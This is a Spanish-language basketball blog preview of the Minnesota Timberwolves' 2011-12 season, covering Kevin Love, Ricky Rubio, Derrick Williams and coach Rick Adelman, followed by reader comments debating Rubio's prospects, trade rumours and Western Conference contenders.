Minnesota Timberwolves: ¿Un paso adelante?

21 de December de 2011 por HisRoyalAirness

Tras una dramática travesía por el desierto y después de la ya lejana Final de Conferencia de 2004, parece que los aficionados de Minneapolis tienen por fín algo por lo que ilusionarse. A pesar del nefasto balance del año pasado (17-61) y los 108 puntos encajados por partido, Kevin Love parece haberse erigido como líder del equipo y sus números (20 puntos-15 rebotes-2´5 asistencias) y su evidente mejora en múltiples facetas del juego (como el tiro de tres) le han valido un merecido MIP que anima a pensar que los Wolves tienen jugador para rato.

A la gran noticia de la progresión de Love se unen un prometedor pick 2 como Derrick Williams, jugador llamado a tener protagonismo inmediato en la liga dada su versatilidad y físico, y la esperada llegada de Ricky Rubio, el pick 5 de hace dos años que tanto revuelo mediático ha causado en las twin cities. Si bien es cierto que la incertidumbre frente al resultado que pueden dar los rookies es una realidad, las cosas parecen haber mejorado con respecto al año pasado.

Después de que Kurt Rambis consiguiese un computo global de 32 victorias en 2 años, la dirección deportiva ha elegido como sucesor a Rick Adelman, ex-entrenador de los dos veces finalistas Blazers y de los dinámicos Kings de J-Will/Bibby (quién te ha visto y quién te ve), Divac, Stojakovic y Webber. Todo hace indicar que intentará mejorar el número de victorias y dar al equipo una identidad hace tiempo inexistente.

En el puesto de base, con el comienzo del training camp, todo parece indicar que el nuevo coach va a dar la oportunidad de llevar las riendas a Ricky. Esto también puede ser un arma de doble filo y el de El Masnou tendrá que conservar el puesto con sus actuaciones, ya que el cumplidor Luke Ridnour y su saber estar andarán al acecho. En el banco estaría el recién llegado (con anillo en el dedo) J.J. Barea, el cual puede que tenga un papel importante en la rotación como 6º hombre anotador.

Wesley Johnson, tras una temporada rookie un tanto decepcionante, debe centrarse, como ya ha dicho Adelman, en aprovechar su físico para atacar más el aro y mejorar sus porcentajes de tiro. El resto de guards como Martell Webster o Wayne Ellington aportarán lo que puedan desde el banquillo y Malcom Lee, elección de segunda ronda, parece que está impresionando a propios y extraños en el camp con su ética de trabajo y su defensa. Tanto es así que los Wolves le han asegurado 3 años de contrato, por lo que parece que puede tener un papel destacable.

El primer dilema del cuerpo técnico será el puesto de small-forward. Las actuaciones de Michael Beasley del pasado año, ya establecido como alero, invitan a pensar que podría ser algo similar a lo que apuntaba en su único año en los Wildcats de Kansas, pero su mentalidad y rigor táctico son tan discutibles como su implicación. Parecen acallados, de momento, los rumores que le situaban fuera de los Wolves para dejar vía libre a la progresión de Derrick Williams puesto que ambos tienen un perfil muy similar y tendrán que batallar por el puesto.

Al margen de la duda de quién estará en el quinteto inicial, el principal problema es más cuantitativo que cualitativo; tanto Beasley como Williams son “3 y medios”, jugadores con características de power forward pero con un déficit de centímetros evidente. El rookie ha jugado siempre de 4 en la universidad pero es utópico pensar que con sus escasos 2’03 puede siquiera soñar con puntear un tiro o disputar un rebote a tipos como Nowitzki, Gasol, Duncan o Garnett.

En el puesto de 4 estará Kevin Love, el hombre del 30-30, para afianzarse ya como una estrella y demostrar que puede ser un habitual en el All Star. Sus 15 rebotes por partido y su buen hacer en ambos tableros recuerdan a jugadores más old-school que los actuales. Sin un físico muy destacable tiene recursos e inteligencia suficientes para imponer su ley en la pintura y su excelente 42% en triples del pasado año lo convierten en una doble amenaza y en un recurso para dejar vía libre a las penetraciones de sus compañeros arrastrando a alguno de los interiores. Anthony Randolph puede hacer también un buen papel desde el banco aportando en anotación y en rebote dando descanso a Love.

La posición más coja es la de 5. Si bien el famoso Darko Milicic (alias “me escogieron antes que a Melo, Bosh y Wade”) no ha jugado un mal papel es evidente que añadir algo de músculo bajo aros no sería una mala idea. Nikola Pekovic puede hacerse hueco en la rotación dados sus 25 años y su gran tamaño, así como el llegado de Houston, Brad Miller.

Una posibilidad es que Adelman decida adaptarse a la condición de base pasador de Ricky y a la agilidad de los jóvenes y utilizar la defensa para salir disparados al contrataque empleando así un quinteto de cinco “pequeños”: Rubio-Johnson-Beasley-Williams-Love.

Por lo tanto, no más esperas para encadenar una reconstrucción tras otra. Hay buenos mimbres para encauzar un buen proyecto y un entrenador con pedigree. El objetivo es mejorar el número de victorias y volver a llenar el Target Center.

Como alternativa emergente al envejecimiento del salvaje oeste vienen llamando a la puerta este grupo de jóvenes cachorros, con talento e ilusión para ver si a corto-medio plazo pueden arañar alguno de esos ansiados puestos de playoff. No son favoritos absolutamente a nada y eso puede darles alas si el nuevo staff técnico da con la tecla y los nuevos rinden a un nivel aceptable. El único techo y la única presión será la autoimpuesta.

Quinteto inicial: Ricky Rubio, Wesley Jonson, Michael Beasley/Derrick Williams, Kevin Love, Darko Milicic
6º Hombre: JJ Barea

Altas: Ricky Rubio, Derrick Williams, Brad Miller, Malcom Lee
Bajas: Johnny Flynn, Lazar Hayward, Sebastian Telfair.

Pronóstico: en la conferencia Este y dado lo atípico de esta temporada podrían pelear uno de los últimos puestos de Playoffs pero en el Oeste hay demasiados equipos de nivel como para dar el gran paso este año. Fuera de Playoffs pero con mejora en porcentaje de victorias.

 

Comenta

30 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Para mí una de las mayores incógnitas de este curso. Un gran jugador como Kevin Love que debería mantener un gran nivel este año como ya lo hiciera el pasado y un puñado de jugadores jóvenes con muchas condiciones pero que habrá que ver cómo mezclan en un equipo. Si todos sacan su potencial podrían sorprender aunque yo creo que todavía es demasiado pronto como para pensar que puedan entrar en playoffs.
    Capitulo aporte merece Ricky Rubio. Tras una temporada bastante mala en el Barcelona le llega su salto a la NBA en medio de gran expectación por parte de todos (a los americanos no se les olvida la final olímpica). Ahora habrá que ver si el basket NBA es para él y si puede ser algo más que un buen base pasador. Tendrá que mejorar su tiro sus penetraciones porque si no es amenaza ofensiva le flotarán descaradamente. Interesante ver cómo se le da el año. Yo creo que le va a venir bien su paso a la NBA pero tengo muchas dudas de que llegue a convertirse en la gran estrella que parecía que sería hace unos años.

      Citar

  2. Ru dice:
    #2

    Lo que más me ilusiona de este proyecto es que ese roster lleno de jóvenes se les añade un tal Adelman para hacerlos sobradamente preparados,y tienen una base sobre la que girar el proyecto que es Kevin Love,aunque creo que pedirles PO es muy precipitado,pero si reman en la dirección correcta y no hay egos entre tanto potencial en ciernes,estamos ante los nuevos Oklahoma.

      Citar

  3. portu dice:
    #3

    Este año tienen grandes áreas de mejora, el 1º Rick Adelman en la dirección, aportará sentido común, libertad y eso se adapta a la plantilla actual… les van a meter 100 ptos por partido, pero ellos tb van a meter muchos; el 2º es la progresión de K. Love, no en números, q eso es casi imposible, pero en intangibles, además está mucho más rápido y lo de su tiro de 3 empieza a ser muy muy serio; 3º el rol de las nuevas incorporaciones, empezando por Ricky, base pasador en un equipo con metralletas ofensivas, Derrick Williams, q tiene una pintaza impresionante, JJ Barea q de microondas puede jugar un papel muy interesante. En conjunto habrá q buscar la química, el no dejarse ir demasiado en defensa y sobretodo hacer encajar las diferentes piezas.
    Sobre Ricky… pues tb flotan descaradamente a Rondo, flotaban antiguamente a Kidd… esos deben ser sus modelos, pero si no se adapta a este juego y a este equipo difícilmente se adaptará a otro baloncesto de alto nivel. Tiene muchos partidos para jugar bien y hacer locuras, le van a permitir un nº razonable de pérdidas (igual q a K. Irving, B. Knight y otros). No debería tener miedo de entrar a canasta y seguro q el tiro cuando esté solo sí lo va a realizar con confianza. Tb me gustaría q cambiara sus hábitos defensivos, más intensidad en el 1×1, no dejar pasar al base rival y no abusar de buscar el robo. Globalmente le veo q cumplirá expectativas como rookie, luego creo q a largo plazo no tiene cualidades físicas como para ser una superestrella, pero como decía tiene 2 casos en los q mirarse bastante similares al suyo como Kidd y Rondo, y no se puede decir q les esté yendo mal en la NBA.

      Citar

  4. GreenPride dice:
    #4

    Ru, decir que estamos ante los nuevos Oklahoma parece un poco precipitado a mi entender. ¿Donde está Durant y Westbrook en los Wolves? (Kevin Love ni se les parece en mi opinión
    portu, en lo de que a Ricky le flotarán como a Rondo y Kidd, verás que no hablo sólo de su lanzamiento sino también de su penetración y tanto Kidd como sobre todo Rondo son auténticos diablos penetrando pero Ricky creo que es su mayor defecto junto a su tiro, es difícil verle entrar a canasta y meterlas ante los pivots. Ojalá explote en la NBA, pero yo empiezo a dudarlo…

      Citar

  5. melo15 dice:
    #5

    Yo si fuera el GM de los wolves venderia a beasley YA por un pivot y un escolta (wes de alero ) y seguramente tambien venderia a randolph pero por lo demas esta muy bien este equipo

      Citar

  6. rumbero dice:
    #6

    Muchas ganas de ver a este equipo con las nuevas incorporaciones y de la mano de Adelman. Como bien dice HisRoyalAirness seguramente les metan una buena cantidad de puntos por partido. A ver hasta que punto de intensidad defensiva pueden llegar, porque variantes en ataque parece que tienen unas cuantas (con la bestia de Love por encima de todas ellas). A Ricky le van a dar la oportunidad, a ver si puede hacer algo más que salir en los Highlights de la jornada. Confio que si. Barea puede tener un rol muy importante, tanto de sexto hombre como cuando se decida jugar con dos bases, y Williams parece que tiene buena pinta. La guinda para el equipo sería un interior de más garantias que Milicic

      Citar

  7. Ru dice:
    #7

    GreenPride:
    Ru, decir que estamos ante los nuevos Oklahoma parece un poco precipitado a mi entender. ¿Donde está Durant y Westbrook en los Wolves? (Kevin Love ni se les parece en mi opinión)

    Es evidente que Love no es equiparable en juego al que puedan aportar Durant y Westbrook,pero no todos los equipos se vertebran con un PG y un Durant(llamado a equipararse a las leyendas de la NBA),los Wolves ya tienen 1 jugador franquicia que es Kevin Love,con 1 jugador que se convierta en una especie de Pippen/Gasol/Westbrook…,en por así decirlo,en “un Robin de Batman(Love)” yo creo que si pueden aspirar a convertirse en los nuevos Oklahoma.Tienen mucho talento joven y la cuestión es que revienten a cracks,al menos alguno.Recuerdo que hace mucho a Beasley lo comparaban con Carmelo…(evidentemente yo no creo que de Beasley salga ya un supercrack).

    Por cierto,tanto Daimiel como Paniagua han comentado en twitter que hay rumores de Gasol a los Bulls por Boozer + Korver…eso lo dije yo hace unos días,porqué los Bulls no intentan hacerse con Gasol(también decía Howard),jajaja

      Citar

  8. HisRoyalAirness dice:
    #8

    Joder lo de Pau a Bulls por Boozer y otro lo dije hace unos días en otro hilo, soy todo un vidente jaja. Si se hace los Lakers estarían haciendo el ridículo más grande de la historia de la franquicia.

    Respecto a los Wolves, cómo puede ser que pongais la entrada a canasta como un defecto de Ricky? Vosotros veis basket FIBA? No abusa de ello, ni mucho menos pero es un buen penetrador y muy creativo. Además es muy listo y sabe sacar faltas, que no todo es meter bandejas haciendo rectificados. Es un gran tirador de libres y eso también es un arma. Yo tengo una fe casi ciega en él porque sé que va a anotar a medida que pase el tiempo y coja confianza.
    El que menos me gusta es Beasley. Es un jugador muy egoista, excesivamente. No mira a los lados ni a tiros y la movilidad de balón es una quimera para él. Tiene un talento descomunal y un olfato anotador innato pero creo que Adelmanle va a intentar poner las pilas y sino lo sienta y pone a Williams, eso seguro.

    A todo esto, me llamaréis energúmeno pero, para mí, los Clippers son YA candidatos al anillo. Digo candidatos, no favoritos pero tal y como está envejeciendo el Oeste no me parece ninguna locura

      Citar

  9. Sancho88 dice:
    #9

    Pues mira, ojalá que se pire a los Bulls, un equipo mas simpático para los españoles, que les den x el ojete a los endiosados lakers. tiene mucho mejor chicago que Lakers, y Boozer+Korver vamos, me parece un chollete del copón. Pues nada, que Boozer se lesiones en Lakers como siempre, y en Chicago a disfrutar de Rose-Rip-Deng-Pau-Noah. si esto ocurre, candidatos numero úno al título sin ninguna duda.

    Sobre Minnesota, yo no les pido playoffs, porque como vosotros decis, les faltan un par de estrellas. Pero bueno, son jóvenes y llegarán hasta donde puedan. A mí, lo que más me gusta de la nba es el basket espectáculo, que no se ve en europa. Yo creo que los Wolves nos lo van a dar y nos lo vamos a pasar de p… madre con ellos. Las jugadas de ricky serán casi todas las noches top 10 y de eso se trata, de disfrutar con estas criaturas igual que lo vamos a hacer con Wizards, Clippers, etc.

      Citar

  10. GreenPride dice:
    #10

    HisRoyalAirness:
    Joder lo de Pau a Bulls por Boozer y otro lo dije hace unos días en otro hilo, soy todo un vidente jaja. Si se hace los Lakers estarían haciendo el ridículo más grande de la historia de la franquicia.

    Totalmente de acuerdo contigo, serían serios candidatos a los peores movimientos en una postemporada de la historia.

    HisRoyalAirness:
    Respecto a los Wolves, cómo puede ser que pongais la entrada a canasta como un defecto de Ricky? Vosotros veis basket FIBA? No abusa de ello, ni mucho menos pero es un buen penetrador y muy creativo. Además es muy listo y sabe sacar faltas, que no todo es meter bandejas haciendo rectificados. Es un gran tirador de libres y eso también es un arma. Yo tengo una fe casi ciega en él porque sé que va a anotar a medida que pase el tiempo y coja confianza.

    Aquí difiero contigo, sí es cierto que tira bien los libres pero yo le veo una dificultades tremendas para dejar bandejas por encima de los pivots ya que no tiene tiro de media distancia, ni bombas ni entradas. Entra siempre más pendiente del pase y los pivots se dan cuenta enseguida (y sí que sigo basket FIBA para decir esto)

    HisRoyalAirness:
    A todo esto, me llamaréis energúmeno pero, para mí, los Clippers son YA candidatos al anillo. Digo candidatos, no favoritos pero tal y como está envejeciendo el Oeste no me parece ninguna locura

    Aquí también de acuerdo contigo, sólo veo a Thunder y Mavs por encima de los Clippers en el Oeste, y no muy por encima que conste…

      Citar

  11. GreenPride dice:
    #11

    HisRoyalAirness:

    HisRoyalAirness:
    Respecto a los Wolves, cómo puede ser que pongais la entrada a canasta como un defecto de Ricky? Vosotros veis basket FIBA? No abusa de ello, ni mucho menos pero es un buen penetrador y muy creativo. Además es muy listo y sabe sacar faltas, que no todo es meter bandejas haciendo rectificados. Es un gran tirador de libres y eso también es un arma. Yo tengo una fe casi ciega en él porque sé que va a anotar a medida que pase el tiempo y coja confianza.

    Totalmente de acuerdo contigo en lo de Lakers, serían serios candidatos a los peores movimientos en una postemporada de la historia.
    Difiero contigo en lo de Ricky, sí es cierto que tira bien los libres pero yo le veo una dificultades tremendas para dejar bandejas por encima de los pivots ya que no tiene tiro de media distancia, ni bombas ni entradas. Entra siempre más pendiente del pase y los pivots se dan cuenta enseguida (y sí que sigo basket FIBA para decir esto
    De acuerdo con los Clips, sólo veo a Thunder y Mavs por encima de los Clippers en el Oeste, y no muy por encima que conste…

      Citar

  12. RSB dice:
    #12

    Es una pena que los Wolves tengan que jugar en el salvaje oeste… En el este como bien comentáis serían aspirantes a entrar en playoff por el último lugar, sería bonito verlos luchar por ello… Siendo realistas acabarán entre los 3-4 peores equipos de su conferencia, pero se espera que mejoren mucho los números. Beasley con todos sus defectos no convendría deshacerse de él tan rápido, primero porque no se sabe si Williams cumplirá con las expectativas o se irá desinflando, y segundo porque si algún día explota todo su potencial va a dejar a más de uno boquiabierto.

    Y respecto a los Clippers: totalmente de acuerdo. Para mí en el oeste hay 4 equipos claramente diferenciados del resto: Thunder, Memphis, Clippers y Dallas. Y si consiguen un escolta capaz de defender, pueden estar metidos perfectamente en las finales de conferencia. Y eso ya es un gran salto para dar la campanada

      Citar

  13. HisRoyalAirness dice:
    #13

    RSB:
    Es una pena que los Wolves tengan que jugar en el salvaje oeste… En el este como bien comentáis serían aspirantes a entrar en playoff por el último lugar, sería bonito verlos luchar por ello… Siendo realistas acabarán entre los 3-4 peores equipos de su conferencia, pero se espera que mejoren mucho los números. Beasley con todos sus defectos no convendría deshacerse de él tan rápido, primero porque no se sabe si Williams cumplirá con las expectativas o se irá desinflando, y segundo porque si algún día explota todo su potencial va a dejar a más de uno boquiabierto.

    Y respecto a los Clippers: totalmente de acuerdo. Para mí en el oeste hay 4 equipos claramente diferenciados del resto: Thunder, Memphis, Clippers y Dallas. Y si consiguen un escolta capaz de defender, pueden estar metidos perfectamente en las finales de conferencia. Y eso ya es un gran salto para dar la campanada

    Con todos los respetos para mí Memphis no entra en ese grupo ni de lejos. Me gustaría mucho y el año pasado seguí sus playoffs con mucha ilusión pero no están a ese nivel, eso me parece.
    Creo que los máximos favoritos del Oeste ahora mismo son OKC y Clippers. Dallas el año pasado tenía un buen 5 defensivo, este ya no y aunque tienen gran potencial ofensivo me parece que no repetiran lo del curso anterior.
    Nunca daría por muertos a Lakers porque tienen 2 superclase en el rooster y a Bynum pero creo que hay mucho mal rollo y una dinámica de vestuario muy negativa, más aún con la marcha de Lamar.

    OKC es para mí el mejor y más completo equipo del Oeste, con mucho, pero han de hacer un par de ajustes y no hay que olvidar que la experiencia es un grado. Tienen que definir de una vez el rol de Westbrook porque a la larga puede ocasionarles problemas y creo que Harden debe ser titular.

    Sobre lo de Ricky, entiendo la opinión de GreenPride y casi la comparto pero creo que su imagen se ha visto muy dañada este último año. Yo recuerdo al jugador de la Penya y del primer año en Barcelona y casi apuesto por él como Rookie del año. Sus porcentajes de tiro? Vistas las actuaciones y la selección de tiro de sus compañeros de promoción (o de John Wall) no van a ser de los peores, ni de lejos (excluyendo a Jimmer, por supuesto). Kemba Walker y Kyrie Irving se tiraron hasta las zapatillas en su debut, mal tiradas, y la gente encantada con ellos

      Citar

  14. Cocinitas dice:
    #14

    Si, es cierto que hay rumores sobre un trade Gasol a cambio de Boozer y Korver, pero dudo mucho que se lleve a cabo. Si Gasol fuera como Odom forzaria el trade, y los Lakers pasarian de ser aspirantes al anillo a luchar por un puesto de playoffs en el oeste.
    En cuanto a Minnesotta, tienen un núcleo muy joven y con talento, si bien este año no creo que pasen de las 20 victorias, y más teniendo en cuenta que van a ser sólo 66 partidos. Love va a ser un AP dominador durante la proxima década, Williams tiene muy buena pinta, y Ricky yo creo que triunfará en NBA; Beasley es un gran anotador, pero le veo demasiado egoista y con un gran problema de visión de juego, lo mejor a mi parecer seria un trade e intentar hacerse con un escolta anotador que supla las carencias de Ricky. Yo además me haria con Daelembert, que aún es agente libre, para el puesto de pivot de pivot.

      Citar

  15. Nacho dice:
    #15

    Sancho88: Sobre Minnesota, yo no les pido playoffs, porque como vosotros decis, les faltan un par de estrellas. Pero bueno, son jóvenes y llegarán hasta donde puedan. A mí, lo que más me gusta de la nba es el basket espectáculo, que no se ve en europa. Yo creo que los Wolves nos lo van a dar y nos lo vamos a pasar de p… madre con ellos. Las jugadas de ricky serán casi todas las noches top 10 y de eso se trata, de disfrutar con estas criaturas igual que lo vamos a hacer con Wizards, Clippers, etc.

    De acuerdo en casi todo esto, es más, en lo referente a Ricky creo que gran parte deculpa de su mala prensa (y juego) de este último año la tiene Xavi Pascual,que encarna muchas virtudes del basket FIBA (y mas concretamente europeo) y muchos defectos. Entre estos últimos el basket control, la primacía del resultado sobre el espectáculo, y se carga a buenos jugadores (obviamente no es Ivanovic), el año pasado comentaba con un colega que sin gustarme demasiado entiendo lo de la NBA con los titulares-reservas, la peña paga por ver a los buenos, y es una pena que Navarro y Ricky jugasen poco más de 20 minutos por partido. Bueno, todo este rollo para decir que confío en este equipo y en Ricky.
    En el tema del día ójala vaya Pau a Bulls, y eso que no es un equipo de mi devoción, pero me haría de ellos, y que les den a los Lakers.
    Con lo del Oeste y los Clippers yo tengo mis dudas (soy del Atleti y todos los años decimos que tenemos una plantilla del carajo pero…) por eso esperaría. Sin embargo Mavs, Thunder y Grizzlies si han demostrado cosas el curso anterior y aunque solo sea por eso hay que tenerlos en cuenta. Y los Lakers pueden liarla sí o sí.

      Citar

  16. Esteban dice:
    #16

    mucho lio arman ustedes los españoles con los wolves, por el hecho de q esta ricky, bueno les cuento, ricky jugara su primera y ultima temporada nba, vi el partido el otro dia, es lento y no tiene fisico y mucho menos tiro para esta liga, luke es mejor y se quedara con el puesto de armador, y barea el de revulsivo, pobre futuro nba para ricky, al mejor estilo raul lopez y sergio rodriguez

    en cuanto a los wolves, no endiendo su equipo, muchisimos jugadores de nivel parecido, y de caracteristicas parecidas y ni un solo lider enserio, capaz q tomar las riendas de las ofensivas, love no lo es

      Citar

  17. RSB dice:
    #17

    HisRoyalAirness: Con todos los respetos para mí Memphis no entra en ese grupo ni de lejos. Me gustaría mucho y el año pasado seguí sus playoffs con mucha ilusión pero no están a ese nivel, eso me parece.
    Creo que los máximos favoritos del Oeste ahora mismo son OKC y Clippers. Dallas el año pasado tenía un buen 5 defensivo, este ya no y aunque tienen gran potencial ofensivo me parece que no repetiran lo del curso anterior.
    Nunca daría por muertos a Lakers porque tienen 2 superclase en el rooster y a Bynum pero creo que hay mucho mal rollo y una dinámica de vestuario muy negativa, más aún con la marcha de Lamar.

    OKC es para mí el mejor y más completo equipo del Oeste, con mucho, pero han de hacer un par de ajustes y no hay que olvidar que la experiencia es un grado. Tienen que definir de una vez el rol de Westbrook porque a la larga puede ocasionarles problemas y creo que Harden debe ser titular.

    Sobre lo de Ricky, entiendo la opinión de GreenPride y casi la comparto pero creo que su imagen se ha visto muy dañada este último año. Yo recuerdo al jugador de la Penya y del primer año en Barcelona y casi apuesto por él como Rookie del año. Sus porcentajes de tiro? Vistas las actuaciones y la selección de tiro de sus compañeros de promoción (o de John Wall) no van a ser de los peores, ni de lejos (excluyendo a Jimmer, por supuesto). Kemba Walker y Kyrie Irving se tiraron hasta las zapatillas en su debut, mal tiradas, y la gente encantada con ellos

    A mí sinceramente siempre me ha costado entender porque todo el mundo ve a los Thunder como un contender y a los Memphis claramente no, cuando el año pasado los segundos no apearon a los primeros en playoff de milagro. Y sin Rudy Gay.

    Me gustaría ver a Thunder o Dallas sin un jugador de este calibre, a ver dónde hubiera llegado. Además barrieron a unos Spurs que, aunque entrados en años, fueron el mejor equipo de temporada regular en el oeste.

    Y tienen un equipazo muy compensado, sin jugadores que visiblemente vayan a ir a menos, más bien al contrario.

    La única pega: la brutal lesión de Arthur, es una faena. Se han quedado sin rotación interior y eso les ha quitado todas las opciones. A ver si se mueven y consiguen a algún interior mínimamente decente. Aún así, los veo por encima del resto de equipos que no he nombrado

      Citar

  18. HisRoyalAirness dice:
    #18

    Esteban:
    mucho lio arman ustedes los españoles con los wolves, por el hecho de q esta ricky, bueno les cuento, ricky jugara su primera y ultima temporada nba, vi el partido el otro dia, es lento y no tiene fisico y mucho menos tiro para esta liga, luke es mejor y se quedara con el puesto de armador, y barea el de revulsivo, pobre futuro nba para ricky, al mejor estilo raul lopez y sergio rodriguez

    en cuanto a los wolves, no endiendo su equipo, muchisimos jugadores de nivel parecido, y de caracteristicas parecidas y ni un solo lider enserio, capaz q tomar las riendas de las ofensivas, love no lo es

    Bueno, pues yo te cuento a ti. Es mejor no dictar sentencia, más cuando va a quedar escrito. Es más, te digo que ni de broma Ricky deja la NBA este año.
    Y Love sí es o puede ser un líder

      Citar

  19. Esteban dice:
    #19

    HisRoyalAirness: Bueno, pues yo te cuento a ti. Es mejor no dictar sentencia, más cuando va a quedar escrito. Es más, te digo que ni de broma Ricky deja la NBA este año.
    Y Love sí es o puede ser un líder

    bueno los pronosticos siempre estan expuestos a los resultados, comparandolos y ver que tal salieron

    lo logico seria q rubio sea una base nba por decadas, es un NUMERO 5 DEL DRAFT, pero no ha caido en el mejor equipo, repito, creo que barea es mejor jugador y riknur puedo hacerlo mejor que rubio, seguramente le daran manija para que se asiente al principio de temporada, pero si no lo hace rapido ira al baquillo antes del final de esta temporada

    es demasiado joven, es cierto, para dar un veredicto de lo que le queda de carrera, pero lo eh visto y no da su juego para la nba, si no anotas, debes ser genial en lo tuyo, estilo rondo, bueno compañero rubio no es aun rondo, quiza en 5 o 6 años si

      Citar

  20. Esteban dice:
    #20

    sobre love, dije que no es un lider capaz de cargar con la ofensiva de un equipo q intente ser importante

    me refiero a q no entiendo para q tienen a milicic, pekovic y miller, si los 3 juegan al mismo nivel, es preferible cambiarlos a los 3 por un buen pivote y un suplente de menos rango

    para q tienen 3 bases como riknur, rubio y barea, en vez de tener uno bueno enserio

    para que tienen a beasley, randholp y derrick williams, los tres son aleros, juegan al mismo nivel, es preferible tener uno solo bueno que cargue con tus ofensivas que esos 3

    insistir con wes jhonson de escolta cuando es claramente alero

    creo q hay una superpoblacion de jugadores de rol, o sextos hombres pero le falta lideres, love puede serlo pero no en ofensiva

    yo hubiese cambiado a todos salvo a barea y rubio y asegurarme a granger, devin harris y un pivote, atraves de intercambios que tener una parba de jugadores iguales

      Citar

  21. portu dice:
    #21

    Claro, Esteban, en la NBA cuando un equipo tiene tre bases malillos los cambia por un bueno fácil, ja,ja,ja pasa todos los días… Los Wolves han ido buscando en el draft lo mejor q quedaba disponible, igual han hecho con retales con cierto potencial de la liga q han conseguido a bajo precio como Beasley, Webster, Randolph o Milicic. Cuando el equipo esté centrado en 2-3 jugadores de alto nivel y encuentren una cierta química de equipo, entonces sí será el momento de buscar aquello q les falte para completar un gran quinteto o para buscar un rol determinado, ahora mismo todo el mundo coincide en q no tienen equipo para aspirar a nada, pero si de algún gran proyecto como Derrick Williams, Wes Johnson o algún otro sale un crack q acompañe a Love, pues entonces sí q ya habría una base de equipo bueno.
    Sobre Ricky, tengo ciertas esperanzas pero siempre he hecho mucho hincapié en sus limitaciones físicas, yo tb le veo falto de velocidad para la NBA… puedo suplirlo pq es un base alto, pero como superestrella no lo veo. Eso sí, su rol sí q puede ser como el de Kidd, que GreenPride decía q era muy bueno penetrando, pero para mi no lo ha sido nunca, vamos, q nunca ha forzado esa faceta, su juego es pasar la bola rápido, correr, transiciones, buscar su tirito estando solo… con Rondo sí te doy la razón q es un gran penetrador, ahí supera muy claramente a Ricky, pero tb es peor tirador, es probablemnete el peor base tirando a canasta de toda la NBA, Euroliga y ACB, j,aj,ja.

      Citar

  22. Esteban dice:
    #22

    portu, no me has entendido, no digo que sea facil traer un gran jugador con esos mimbres, pero si estrellas de clase b de equipos en recontruccion, digamos, armar algunos packs, con riknur+beasley+milicic+williams y otro pack con rubio+miller+randholph o asi similares e intentar ir por MONTA ELLIS, DEVIN HARRIS, JOSH SMITH, DALEMBERT, SCOLA, MARTIN, GRANGER o cosas similares, creo que dos jugadores de cierto nivel acompañarian mejor a love q todos estos

    sobre williams, quiza me equivoque pero lo veo un fracaso, es un jugador de apenas 2.03 cts muy pero muy pesado para jugar de alero, y medio bajo para ser ala pivote, ademas parece que tiene las rodillas destruidad…
    creo que debera intentar hacerse un lugar como ala pivote al estilo eltron brand sino no tendra lugar

      Citar

  23. portu dice:
    #23

    Claro q te entendía, pero lo q yo veo es q Minesota no tiene claro quien vale y quien no vale… saben que Love es nivel All Star, pero después de él no tienen ni idea quien le puede seguir al nivel de los Pau, Boozer, Noah, Amare, etc,… pueden sacar uno o dos entre varios de los q tienen ahora o de algún pick futuro, sobretodo Wes Johnson, Ricky, Derrick Williams… claro q Josh Smith es ahora mismo mejor q Beasley o Derrick Williams, Devin Harris mejor q Ricky y Granger mejor q Wes Johnson, pero es q esos jugadores de gran nivel no son fáciles de conseguir y además, tampoco han demostrado ser tan buenos como para llevar muy lejos a sus equipos… tiene lógica apostar por el proyecto de jóvenes y si resulta q Derrick y Ricky son unos fenómenos, si el equipo se va haciendo y si suman colectivamente un equipo competitivo, entonces será el momento de traerte piezas concretas q refuercen las posiciones débiles o q mejoren los Milicic y demás. Hoy por hoy el equipo sería igual de malo (o de bueno) con Dalembert q con Milicic, igual con Granger q con Beasley, … incluso otros nombres q aportas a mi entender están francamente sobrevalorados, nulos en defnsa, jugadores egoistas q no sé si sumarían mucho…

      Citar

  24. Esteban dice:
    #24

    portu:
    Claro q te entendía, pero lo q yo veo es q Minesota no tiene claro quien vale y quien no vale… saben que Love es nivel All Star, pero después de él no tienen ni idea quien le puede seguir al nivel de los Pau, Boozer, Noah, Amare, etc,… pueden sacar uno o dos entre varios de los q tienen ahora o de algún pick futuro, sobretodo Wes Johnson, Ricky, Derrick Williams… claro q Josh Smith es ahora mismo mejor q Beasley o Derrick Williams, Devin Harris mejor q Ricky y Granger mejor q Wes Johnson, pero es q esos jugadores de gran nivel no son fáciles de conseguir y además, tampoco han demostrado ser tan buenos como para llevar muy lejos a sus equipos… tiene lógica apostar por el proyecto de jóvenes y si resulta q Derrick y Ricky son unos fenómenos, si el equipo se va haciendo y si suman colectivamente un equipo competitivo, entonces será el momento de traerte piezas concretas q refuercen las posiciones débiles o q mejoren los Milicic y demás. Hoy por hoy el equipo sería igual de malo (o de bueno) con Dalembert q con Milicic, igual con Granger q con Beasley, … incluso otros nombres q aportas a mi entender están francamente sobrevalorados, nulos en defnsa, jugadores egoistas q no sé si sumarían mucho…

    wow si que les tienes estima a beasley y milicic, eres su agente o que? beasley igual a granger? que liga miras? milicic igual a dalembert? eres el gm que lo eligio por adelante de wade, bosh y melo?

    a mi entender le sobran piezas jovenes con salarios bajos que podrian ser atractivos para otros equipos, que por estar mas armados puede que jueguen mejor, los pacers necesitaban un 4 y un 3, granger por beasley y williams podria haberse hecho, reducen en edad, por ejemplo

    los warriors no van a ningun lado con monta ellis y curry, quiza ofrecerle 3 jugadores que cobran lo mismo que ellis para dar un golpe de timon

    creo q tienen suficientes activos atractivos para intercambiar, pero que seas atractivos para intercambiar no significa que sean atractivos para jugar juntos…

      Citar

  25. melo15 dice:
    #25

    Esteban a ti todo te parece mal
    Pero williams es un pedazo de jugador en lo que tienes razon esque han de vender jugadores YA beasley johnson fuera y asi intentar hacer un equipo mas compensado

      Citar

  26. Esteban dice:
    #26

    melo15:
    Esteban a ti todo te parece mal
    Pero williams es un pedazo de jugador en lo que tienes razon esque han de vender jugadores YA beasley johnson fuera y asi intentar hacer un equipo mas compensado

    exacto, hablo de compensar el equipo, quiza esta temporada corta les favorezca una rotacion tan larga y pareja, pero creo que le sobran jugadores para hacer un paquete y traer a alguien que los jerarquize, no me parece logico tener tantos jovenes que deben desarrollarse si son tantos y no hay tiempo para que se desarrollen todos

    la cosa puede cambiar si, si love juega de 5… y habre espacio para williams y beasley de 4, y wes jhonson y rhandolph de 3, lo que a las vez dejaria al equipo sin escoltas y sin minutos a MILICIC, PEKOCI Y MILLER con el pastizal que estos cobran

    en fin lo que yo llamaria un equipo descompensado

      Citar

  27. portu dice:
    #27

